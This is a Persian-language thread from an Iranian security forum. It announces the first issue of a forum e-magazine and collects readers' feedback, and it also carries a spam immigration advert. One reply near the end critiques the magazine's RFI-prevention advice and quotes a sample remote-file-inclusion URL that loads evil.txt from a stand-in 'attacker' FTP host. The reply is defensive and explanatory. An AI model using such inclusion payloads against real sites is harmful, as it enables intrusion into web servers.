![]() |
|
|
||||
|
||||
|
با سلام خدمت همه دوستان
ماهنامه شماره اول شبگرد هم بعد از کمک دوستان و همکاری تیم چهارنفره شروع بکار کرد. نخستین شماره این ماهنامه در 8 صفحه است که در شماره های بعدی پربارتر از قبل خواهد بود. با سپاس فراوان از اشکان امید و وحید برای کمک ها و هماهنگی ها size:969 KB mirror 1 http://mahdieh.axspace.com/shabgard/Shab-Mag.No1.pdf mirror 2 http://bankit-ads.com/Shab-Mag.No1.pdf mirror 3 http://zahedanhall.ir/forum/showthread.php?t=105
پذیرش دانشجویی و اقامت سرمایه گذاری انگلیس http:www.as-immigration.co.uk ---------------------------------------------------- اقامت تضمینی آمریکا و کانادا 85 میلیون (3- تا 6 ماه بستگی به سن) تماس خصوصی Last edited by joker; 09-06-2008 at 07:03 AM.. دليل: ضمیمه فایل. |
| The Following 32 Users Say Thank You to mserm For This Useful Post: | ||
angeremino, ashi_bomba2006, cyber.zer0, Delphi_Develope, dj7xpl, Guest, h27, iM4n, J33n, J@v!)@N, jaber, joker, k-2, K0d, kamiii, khorzoo, lachin, M0h4mm4d, p3rtinax, PaMPaM, q8x, Qurd_Az, r3dm0v3, Rash, reza.exe, satanic_soulful, Sc0rpioN, sinasadegi, snake, stone_cod3r, W4n73d, X32X | ||
|
|
||||
|
||||
|
البته اينبار فرصت کم بود ايشالا تو شمارهای بعد چندين بخش اضافه ميکنيم
اينبار خواستيم شماره اول رو بديم که بدونيد اين مجله مياد ايشالا از شماره های بعدی خيلی پر بار تر و با مطالب بيشتر خواهد بود اگر هم کمبودی چيزی ديديد يا نظری بود همين جا يا به mail يکی از بچه ها بفرستيد ممنون اميد |
| The Following 4 Users Say Thank You to al_omid For This Useful Post: | ||
|
|
|||
|
|||
|
به نام خدا !
سلام ! فعلا وسط dl مجله هستم اينم نكه 3 تا بياد ديگه پايان داده ميشه يه مجله بايد هميشه چاب بشه و مطالب به روز داخلش باشه و براي همه افراد باشه نه مثل مجله اول satanic كه فقط درباره ي bluetooth هست اون ميشه يه مقاله نه mag . ------------------------------------------------------------------------------------------------- بايد از نظر ادبي سطحش بالا باشه !!! ----------------------------------------------- مجله را ديدم قشنگ درست كرديد خيلي خوب طرح بهش داديد و روش كار كرديد كارد بندي هم خوبه فقط مطالب تازه و در حدود 20 صفحه باشه + عكس هايي از چندين هكر و خبرهاي از اين قبيل تا خواننده خسته نشود !!! -------------------------------------------------------- در مورد ويروسها هم من مي تونم اطلاعاتي بدم اگر خواستيد در شمار بدي ! با تشكر ----------- عسل كريمي پور
|
||||
|
||||
|
نقل قل:
مجله ماه آینده شمال 12 سفحه میشه چون از 3 روز پیش کارها هماهنگ شده منتظر عک س و اخبارهایی هم از هکرهای بزرگ ایران باشید در این مجله یک خواهش دارم تو این تاپیک فقط راجع به مجله صحبت بشه در ضمن هرک س دوست داره مقاله ای بده با یکی از این 4نفر تماس بگیره (ایمیل ها تو مجله هست) در موردش صحبت میشه و اگه مقاله حالب باشه حتما تو مجله قرار داده میشه نقل قل:
Last edited by ashi_bomba2006; 09-06-2008 at 03:01 PM.. |
|
|
||||
|
||||
|
نقل قل:
باز هم ممنون از شما، همون طور که اشکان گفت از مقالات ديگر دوستان هم استفاده ميکنيم اگر خوب باشه، فقط لطف کنيد مقالات و دست نوشته هاتون رو به mail يکی از 4 نفر بفرستيد راستی ممنون از اونايی که خوندن و ايراد گرفتن فکر نميکردم تو اين مدت چند ساعته **ی پيشنهاد سازنده بده،،باز هم از اين کارا بکنيدتشکر، |
|
|
|||
|
|||
|
خوب بود اما عالی نبود
فکر میکنم بخاطر انجامش توی زمان کم بود میتونید با اساتید همین شبگرد مصاحبه هم داشته باشید تخصصی ترش کنید
|
||||
|
||||
|
خیلی خوب بود امیدوارم به کارتون ادامه بدید
|
||||
|
||||
|
سلام
خیلی عالی بود ولی اگر بخش ها و موضوع های رو زیادتر ومختلف تر بکنید فکر کنم بهتر هم میشه |
|
|
||||
|
||||
|
با سلام
خوب بود و پیداست زحمت کشیدید. دستتون درد نکنه. اما یه انتقاد کوچولو. سعی کنید با یه طراح گرافیست همکاری کنید و قالب بندی صفحاتتون خوب نیست. با تشکر.
|
|||
|
|||
|
با تشکر از دوستان نویسنده
من چند روزی نبودم بله کامل و خوب بود مشکلات بسیار کوچیکی داشت که 100% دوستان درست میکنن در شماره بعدی من از طرف کلیه کلن لیدر ها از این دوستان تشکر میکنم هر چند همه دوستان تشکر کردن زیر پست اول ایشالا شمارهای بعدی بعدی و بعدی عسل جون من اگه میدونستم شما میخونش چند خط هم عاشقانه مینوشتم برات |
| The Following User Says Thank You to For This Useful Post: | ||
|
|
||||
|
||||
|
ممنون از تشكر دوستان.من هم به عنوان يك شاگرد همكاري داشتم و البته دوستان انتقاداتي هم كردند ولي تشكر ميكنم از انتقادات و اگر كمك به بهتر شدن مطالب بعدي كنه(كه ميكنه) خيلي هم خوشحال ميشم.
صفحه آرايي هم عجله اي شده وگرنه احسان خان استاده و گرافيكش حرف نداره بازم تشكر از لطف دوستان
به نو کردن ماه بر بام شدم با عقیق و سبزه و آینه. داسی سرد بر آسمان گذشت که پرواز کبوتر ممنوع است. صنوبر ها به نجوا چیزی گفتند و گزمگان به هیاهو شمشیر در پرندگان نهادند. ماه برنیامد. احمــــــــــــد شاملو |
| The Following User Says Thank You to khorzoo For This Useful Post: | ||
|
|
||||
|
||||
|
خوب بید....
هر وقت فکر کردین به نقطه ای رسیدین که چیز جدیدی دارین به دنیا معرفی میکنید ، شروع کنید همزمان به زبون انگلیسیشم آماده کنید بزاریم تو این سایت مایتهای خارجکیها رو کم کنی تاکی ترجمه مقاله های اونا ؟ یه کم اونا مقاله های شما... از حالا گفتم که به فکر قالب و اینا و نیروی مترجمش باشید.... تو شبگرد یه چیزی که بخواد انجام بشه 6ماه طول میکشه ( آخرشم ممکنه نشه |
| The Following User Says Thank You to joker For This Useful Post: | ||
|
|
||||
|
||||
|
دمت گرم و خسته نباشید
و خوشحال میشم ادامه بدین . مثل مجله قبلی نباشی و یا طراح های که قرار بود انجام بشه ( که نشد ) از اساتید شبگرد هم کمک بگیرد اگه کمک هم نکردن به زور این کارو بکنید در ضمن تعداد صفحه هم زیاد بشه بد نیست باز هم تشکر
|
||||
|
||||
|
نقل قل:
|
|||
|
|||
|
سلام
در قسمت "چگونه از حملات RFI جلوگیری کنیم" نویسنده از تابع eregi() برای خواندن ورودی استفاده کرده، که در سطر بعدی با استفاده از If statement رشته ی "http://" را اصطلاحا" filter کرده. خود نویسنده تذکر داده که هنوز باگ LFI وجود دارد. مشکل اینجاست که hacker میتونه از ftp برای RFI Attack استفاده کند. کد:
http://site.com/dir/file.php?variable=ftp://attacker/dir/evil.txt راه حل مناسب و استاندارد برای جلوگیری از RFI، تعریف کردن متغییر است با دستور define: PHP کد:
|
| The Following 3 Users Say Thank You to For This Useful Post: | ||
![]() |
| اختيارات بحث | |
| نمايش رسم | |
|
|
گفتگو هاي مشابه
|
||||
| بحث | شروع کننده بحث | تالار | جواب ها | آخرين گفتگو |
| بررسی یک مشکل | s7az2mm | متفرقه | 20 | 10-18-2007 06:07 PM |
| اولين شماره مجله الكترونيكي شبگرد | satanic_soulful | بخش هک و سکیوریتی | 25 | 07-01-2007 06:15 AM |
| عدم نمایش شماره موبایل Dont Duplicate It!!!!! | hamid_tonight | متفرقه | 12 | 06-22-2007 09:50 PM |